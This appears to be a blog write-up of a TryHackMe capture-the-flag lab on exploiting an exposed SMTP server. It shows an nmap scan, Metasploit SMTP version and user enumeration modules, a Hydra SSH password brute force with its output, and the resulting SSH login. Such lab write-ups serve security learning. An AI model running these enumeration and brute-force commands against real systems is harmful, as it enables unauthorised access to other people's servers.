Exploiting SMTP

Oct 17, 2024

Blog · CTF · Networking

How to Enumerate and Exploit an Exposed SMTP (Mail) Server

💻 THM CTF Reference

image

SMTP

Simple Mail Transfer Protocol aka SMTP allows for the process by which mail clients send mail to each other. If we were to compare the email service to the postal delivery service, SMTP would be the courrier, delivering mail from the post office to the recipient’s address, except in this case every address is also its own post office. The courrier tends to know important information about its sender so we’ll be trying to get as much information out of it as we can. Thankfully the SMTP service is very receptive to questions so we will be able to pry valuable insights from it in order to compromise its server.

Identifying the SMTP Service

The first step of identifying possible attack vectors is running a network Nmap scan to see what ports are open on services that we know how to abuse. In this case we’re looking for port 25 exposing the SMTP service to the internet.

Example Nmap Scan: (NFS Scan highlighted)

 1root@ip-10-10-22-136:~# IP=10.10.190.97
 2root@ip-10-10-22-136:~# nmap -sS -T4 -F -oN output.txt $IP
 3
 4Nmap scan report for ip-10-10-190-97.eu-west-1.compute.internal (10.10.190.97)
 5Host is up (0.00070s latency).
 6Not shown: 998 closed ports
 7PORT   STATE SERVICE
 822/tcp open  ssh
 925/tcp open  smtp
10MAC Address: 02:87:B2:A3:3F:17 (Unknown)
11# Nmap done at Sun Oct  6 01:22:55 2024 -- 1 IP address (1 host up) scanned in 1.68 seconds
ℹ️
The call above uses the flag -sS to perform a stealthy SYN scan, which is faster and less detectable than a full connection scan. The -T4 flag sets the timing template to be faster than the default, balancing speed and accuracy. The -F flag specifies a fast scan that targets the top 100 most common ports. The -oN output.txt flag saves the scan results in a normal format to a file named output.txt. Finally, $IP specifies the target IP address for the scan.

Getting the SMTP server metadata

Now that we’ve identified a way in, we can use a premade SMTP attack script to extract as much valuable metadata we can using the Metasploit smtp_version script. In this case we’re able to extract the smtp server’s domain name but not much else that’s useful. We’ll try a more aggressive script next.

 1msfconsole
 2msf6 > use auxiliary/scanner/smtp/smtp_version
 3msf6 auxiliary(scanner/smtp/smtp_version) > set RHOSTS 10.10.22.136
 4
 5
 6Module options (auxiliary/scanner/smtp/smtp_version):
 7
 8Name     Current Setting  Required  Description
 9----     ---------------  --------  -----------
10RHOSTS   10.10.22.136     yes       The target host(s), see https://docs.metasploit.com/docs/using-me
11                                    tasploit/basics/using-metasploit.html
12RPORT    25               yes       The target port (TCP)
13THREADS  1                yes       The number of concurrent threads (max one per host)
14
15msf6 auxiliary(scanner/smtp/smtp_version) > run
16
17[+] 10.10.190.97:25       - 10.10.190.97:25 SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
18[*] 10.10.190.97:25       - Scanned 1 of 1 hosts (100% complete)
19[*] Auxiliary module execution completed

Finding the SMTP server exposed usernames

We’ll try to brute force our SMTP courrier to get it to tell us who it expects us to be talking to. We’ll keep asking it whether it recognizes the name we give it with a enumeration brute force attack and hopefully we’ll get a match. In this case we were able to tell that the SMTP knows the user “administrator” which gives us valuable insight into a possible user on the system. It is especially exciting to confirm the existance of an administrator user because compromising their account can lead to unrestricted access to their entire server!

 1msf6 auxiliary(scanner/smtp/smtp_version) > use /auxiliary/scanner/smtp/smtp_enum
 2msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.190.97
 3msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
 4msf6 auxiliary(scanner/smtp/smtp_enum) > run
 5
 6
 7[*] 10.10.190.97:25       - 10.10.190.97:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
 8[+] 10.10.190.97:25       - 10.10.190.97:25 Users found: administrator
 9[*] 10.10.190.97:25       - Scanned 1 of 1 hosts (100% complete)
10[*] Auxiliary module execution completed

Running Hydra to Brute Force the password

This isn’t a very nice way to break into a system but we’ll continue to use the brute force enumeration approach along with the username we found to try to log into the server via ssh. We’ll use the hydra tool to enumerate different passwords until we get one that works.

Luckily there was a direct match and we found a password for the administrator user, if only it was always this simple 😊

1hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.190.97 ssh
2
3[22][ssh] host: 10.10.190.97   login: administrator   password: alejandro
4[STATUS] attack finished for 10.10.190.97 (waiting for children to complete tests)
51 of 1 target successfully completed, 1 valid password found
ℹ️
The call above uses the flag -t 16 to spawn 16 threads to attempt logins on the specified username -l administrator using the filepath -P rockyou.txt for passwords on the server’s IP via ssh in -vV very verbose mode.

Logging into the server with credentials

Equiped with a username and password we can easily SSH into the server unless it has other protections in place.

1ssh administrator@10.10.190.97
2administrator@10.10.190.97's password: alejandro
3
4Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-111-generic x86_64)
5
6administrator@polosmtp:~$

Connect with Me

If you found this write-up helpful, follow me on Twitter for more content like this. Happy hacking! 👾